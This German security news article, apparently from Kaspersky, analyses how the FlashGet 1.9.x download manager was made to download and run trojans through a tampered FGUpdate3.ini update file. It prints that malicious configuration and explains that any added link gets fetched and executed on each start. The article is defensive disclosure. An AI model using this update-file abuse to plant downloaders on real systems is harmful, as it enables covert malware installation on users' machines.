News

TrojanGet

Vor einigen Tagen erhielten wir die ersten E-Mails von Anwendern, auf deren Computern der Anti-Virus trojanische Programme im Verzeichnis des populären Download-Managers FlashGet gefunden hatte.

Eine Analyse des Problems ergab, dass die Anwender dieses Programms auf der ganzen Welt davon betroffen sind. Symptomatisch für eine Infizierung ist das Erscheinen von Dateien im System mit den Bezeichnungen inapp4.exe, inapp5.exe, inapp6.exe, die vom Kaspersky Anti-Virus als Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezxo, Trojan-Dowloader.Win32.Agent.kht erkannt werden.

Sonderbar war, dass neben diesen keine anderen trojanischen Programme gefunden wurden, über die die oben genannten ins System hätten eindringen können – mehr war einfach nicht zu finden. Einige der betroffenen Anwender hatten alle Patches für das Betriebssystem und den Browser installiert. Wie also waren die Schadprogramme auf die Computer gelangt?

Unsere Aufmerksamkeit richtete sich sofort auf den Ort, an dem die Trojaner saßen – das Verzeichnis von Flashget selbst. Wie sich zeigte, wies neben den Trojanern auch die Datei FGUpdate3.ini ein aktuelles Erstellungs-/Änderungsdatum auf (Unterschiede zu Originaldateien sind blau hervorgehoben):

[Add] fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031

[AddEx] [fgres1.ini] url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif] url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%

[inapp4.exe] url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%

Merkwürdigerweise verwies der Link auf der – trojanischen – Datei inapp4.exe auf die echte FlashGet-Site, von der sich der Trojaner als appA.cab herunter lud.

Auf der Website von FlashGet gab es keinerlei Hinweise auf den Vorfall, aber in dem Anwenderforum des Programms fand sich eine Menge Einträge über Fälle von Infizierungen. Seitens der Hersteller nichts als Schweigen.

Den Informationen zufolge, die wir im Netz fanden, kam es bereits am 29. Februar zu der ersten Infizierung. Der letzte uns bekannte Fall datiert auf den 09. März.

Zehn Tage lang spielte ein legales Programm die Rolle eines Trojan-Downloaders, indem es die Installation und den Start von trojanischen Programmen im System des Anwenders realisierte, die auf der Seite des Herstellers platziert waren!
Zum gegenwärtigen Zeitpunkt sind die Trojaner von der Site entfernt und FGUpdate3.ini (die ebenfalls aus dem Netz geladen wird) wurde in ihren ursprünglichen Zustand zurück versetzt.

Unserer Meinung nach gibt es zwei Methoden, mittels derer FlashGet in einen Trojan-Downloader verwandelt werden kann. Die erste ist auch die offensichtlichste: Die Site des Herstellerunternehmens wurde gehackt und als Folge waren die Kriminellen in der Lage, die Standard-Konfigurationsdatei auszutauschen, die auf das trojanische Programm verweist, das ebenfalls dort platziert ist!

Warum sich die Hacker ausgerechnet diese Website ausgesucht haben, wissen wir nicht. Vermutlich aus Tarnungsgründen – ein Link auf die FlashGet-Site in der Konfig-Datei erweckt vermutlich kein Misstrauen. Wir wollten nun herausfinden, ob dieser Trick auch für den Download beliebiger anderer Dateien von beliebigen anderen Sites anwendbar ist.

Die Antwort lautet: ja.

Man muss der Datei FGUpdate3.ini lediglich den eigenen Link – worauf auch immer – hinzufügen, und die entsprechende Datei wird automatisch bei jedem Start von FlashGet auf dem Computer geladen und gestartet. Selbst wenn die Schaltfläche „Aktualisieren“ nicht angeklickt wird, erhält FlashGet die Informationen selbstständig aus der ini-Datei!

Die „Schwachstelle“ existiert in allen Versionen FlashGet 1.9.xx.

Obgleich das Problem der „gehackten“ FlashGet-Site aktuell beseitigt ist, bedeutet dies, dass die Schwachstelle für die Sicherheit des Anwenders bestehen bleibt. Denn jedes beliebige trojanische Programm kann die lokale ini-Datei von FlashGet verändern und sie so in einen Trojan-Downloader umwandeln.

Vielleicht lohnt es sich darüber nachzudenken, dass FlashGet normalerweise zu den „vertrauenswürdigen“ Anwendungen gehört, denen jegliche Netzaktivität und Anfragen an jegliche Websites erlaubt sind?

Zum gegenwärtigen Zeitpunkt gibt es keine offizielle Stellungnahme des chinesischen Entwicklers von FlashGet. Die tatsächlichen Gründe für die Vorkommnisse bleiben nach wie vor im Dunkeln und es gibt keine Garantie dafür, dass sich Derartiges nicht wiederholt.

Möge jeder seine eigenen Schlüsse daraus ziehen…

TrojanGet

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

 

Berichte

Virologie mobiler Geräte 2016

Im Jahr 2016 stieg die Zahl der Werbe-Trojaner, die in der Lage sind, Superuser-Rechte zu nutzen, weiterhin an. Im Verlauf des gesamten Jahres war das die Bedrohung Nummer eins und wir können bisher keinerlei Anzeichen für eine Trendwende in diesem Bereich erkennen.

Spam im Jahr 2016

Im Jahr 2016 haben sich in den Spam-Strömen verschiedene Veränderungen vollzogen. Die bedeutsamste Veränderung ist dabei sicherlich die Zunahme von Versendungen mit schädlichen Erpresser-Programmen. Wenn man berücksichtigt, wie relativ einfach diese Programme auf dem Schwarzmarkt zu haben sind, so wird sich diese Tendenz aller Wahrscheinlichkeit fortsetzen.

Kaspersky Security Bulletin 2016/2017. Jahresrückblick. Statistik für 2016

2016 war ein angespanntes und turbulentes Jahr im Cyberspace – von riesigen IoT-Botnets über Ransomware bis hin zu zielgerichteten Cyberspionage-Attacken, Finanzdiebstählen und Hacktivismus war alles vertreten – und sogar noch vieles mehr. Der Jahresrückblick und die Statistik für 2016 von Kaspersky Lab liefern einen detaillierten Überblick über diese Ereignisse. Die Kurzzusammenfassung finden Sie hier.

Kaspersky Security Bulletin 2016/2017. Die Ransomware-Revolution

Zwischen Januar und September 2016 hat sich die Zahl der Ransomware-Attacken auf Unternehmen verdreifacht, das ist gleichbedeutend mit einem Angriff alle 40 Sekunden. Der Markt für Ransomware-as-a-Service boomt, das Projekt NoMoreRansom wurde ins Leben gerufen: Für Kaspersky Lab ist Ransomware DAS Thema des Jahres 2016.

Abonnieren Sie unsere wöchentlichen E-Mails

Brandaktuelle Themen direkt in Ihr Postfach